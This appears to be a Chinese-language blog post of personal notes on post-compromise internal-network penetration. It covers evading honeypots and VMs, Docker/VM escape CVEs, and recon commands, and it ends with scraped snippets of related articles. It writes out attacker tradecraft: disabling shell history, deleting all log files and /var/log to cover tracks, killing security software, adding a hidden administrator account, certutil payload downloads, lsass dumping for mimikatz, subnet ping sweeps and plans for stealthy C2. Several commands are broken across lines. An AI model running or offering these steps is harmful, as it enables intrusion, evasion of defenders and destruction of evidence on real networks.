拿到shell進入內網後雖然ms17010橫行但也是不能拿著掃瞄器到處掃的,每一步都應該小心謹慎,基本原則就是不要被扣分
所以首先在下認為應該判斷是否為虛擬機器,docker,蜜獾等
docker通常會有一些命令not find例如ifconfig uname-a 等
如果打著四面漏風的系統多半就是蜜獾了,而且裡面沒有正經的辦公痕跡的也很可疑
可以用如下方式識別一些簡單蜜獾
1.bof的識別;bof(back officer friendly)
2. 假**技術,關注honeypot hunter軟體;
3. honeyd的識別;
4. 利用sebek識別蜜網,第
二、三代蜜網都有這個軟體;
5. tarpits的識別;
6. 外聯資料控制識別,一般蜜罐會嚴格限制系統向外的流量;
7. 識別vmware虛擬機器,重點關注mac位址的範圍
8. 用nmap等scan工具,同乙個機器同時開放很多port的。
9. 因為很多蜜罐都設定在相同或臨近的網段。所以,同乙個網段(e.g. /24),很多機器都開放相同的port,回應相似的response。
10. 去shodan/censys查
vm虛擬機器為執行xchg ecx,eax 時間大於0xff時可以確定,上傳檢測小指令碼測試
//使用如下命令判斷docker
ls -alh .
/dockerenv
cat /proc/
1/cgroup
env \ path
//檢查是否有docker相關的環境變數
//ifconfig可以直接看到docker網絡卡,沒有ifconfig時檢視本機ip
cat /etc/hosts
//檢測vm虛擬機器
sudo dd if
=/dev/mem bs=
64k skip=
12 count=
1| string -n10 //會與物理機得到不一樣的輸出
docker逃逸
//常用方法
emote api 未授權訪問//2357埠
docker.sock掛載到容器內部
特權模式docker run --privileged
runc(cve
-2019
-5736)
dirty cow(cve
-2016
-5195)
vm逃逸
1、uaf漏洞,控制rip;
2、out-
of-bound read 漏洞。
3、out-
of-bound write 漏洞。和第二個漏洞合力起到洩露關鍵資訊的作用。
cve-
2015
-5165(乙個記憶體洩露漏洞)
cve-
2015
-7504(乙個堆溢位漏洞)
cve-
2017
-4901
cve-
2020
-4004
/5 只能想想,還沒poc
開始收集一些系統資訊
linux
set
+0 history //關閉記錄功能,結束後-o開啟
pa aux //顯示所有使用者的程序,檢視是什麼防火牆
chkconfig --list //檢視服務
systemctl status firewalld //檢視防火牆狀態
ifconfig -a //多半有域資訊
history //檢視敏感操作
for k in
$( seq 1
255)
;do ping -c 1
192.168
.99.$k|grep "ttl"
|awk -
f"[ :]+"
''; done //c段掃瞄
egrep expect /* -rl |grep 「.sh」 //遞迴查詢包含expect欄位的檔案,查運維用的密碼
find / -name "*.log" -exec rm -rvf {} \; //痕跡清理
rm -f -r /var/log //日誌清理
window
echo %
processor_architecture
%//系統體系結構
whoami && whoami /priv //當前使用者許可權
ipconfig /all //多半有域資訊
tasklist //window顯示程序
wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname,productstate, pathtosignedproductexe //顯示防毒軟體
taskkill //killwaf
wmic service list brief //顯示服務
tracert
-d -h ip //出網如果1跳就多半沒有流量監測與網路防護裝置
systeminfo //拿著補丁可以區bugs.hacking8.com/tiquan/ 查exp
net user 使用者名稱 密碼 /add //新增新使用者,需要administrator許可權
net localgroup administrators 使用者名稱 /add //把使用者提公升為管理員許可權,需要administrator許可權
net user /dom //盡量別用net user /domain別問我怎麼知道的
//持久控制
certutil -urlcache -split -f
lsass dump到本地再mimikatz抓取
for/l %i in(1
,1,255
)do @ping 192.168
.64.
%i -w 1
-n 1
|find /i "ttl="
//c段掃瞄
收集到系統資訊可以開始判斷當前系統是屬於什麼角色
檔案伺服器:配合社工,生成payload**到檔案伺服器公用檔案上,可批量上線主機
dns伺服器:埠53,可通過dns伺服器獲取內網web系統資訊,或者探測域資訊
dhcp伺服器:檢視內網多組網段資訊,更多的獲取拓補資訊
開發測試伺服器:獲取原始碼,新的資訊資產,多存在弱口令
**伺服器:獲取伺服器賬號,拿到各種密碼
web伺服器:可能需要提權
個人pc:檢視是否存在域環境
我的內網滲透思路
1.先隱蔽的收集資訊
2.列出環境中所有waf,殺軟等
3.找出系統的主要工作專案,制定可能有關聯的移動方向與魚叉思路,理清內網拓撲圖,網段.
4依次繞過或者暫時關閉waf,進行埠**,掃瞄內網,路由,交換機,埠等判斷是域還是組。
5.組的話,用常見 web 方法。
6.域的話 gpp,kerberos,****票據,抓密碼,
7.pth,ptk,spn 掃瞄,ipc,445,web 漏洞,各種未授權,密碼相同等.
8.進行埠**,連線msf,進一步ms17010等,ms14-068移動到域控
9.****進行持久控制
10.dns,域前置隱蔽c2
11.claerv和刪除路由表,web日誌,系統登入日誌,安全日誌
內網滲透 內網滲透測試基礎 1
內網也指區域網 local area network 是指在某一區域內由多台計算機互聯而成的計算機組,組網範圍通常在數千公尺以內。在區域網中,可以實現檔案管理 應用軟體共享 印表機共享 工作組內的日程安排 電子郵件和傳真通訊服務等。內網是封閉的,可以由辦公室內的兩台計算機組成,也可以由乙個公司內的大...
內網攻擊域滲透學習 筆記
有了內網的第一台機器的許可權後,就到了很關鍵的一步資訊收集,它也是內網滲透中不可或缺的一部分。檢視當前機器的網路環境,收集域裡的相關資訊,包括所有的使用者 所有的計算機,以及相關關鍵組的資訊。net user domain 檢視域使用者 net view domain 檢視有幾個域 net view...
再談內網滲透
前言 看了 g.r0b1n文章 內網滲透 抑制不住自己衝動的心情,寫一篇 再談內網滲透 希望以後有朋友能更新 詳談內網滲透 在我的腦子裡面我始終認為,一次滲透至少要控制被滲透物件80 以上伺服器才能算得上一次成功的滲透。希望朋友們能夠多提寶貴意見。正文 我沒有內網域裡面某個機器的許可權,我只有乙個存...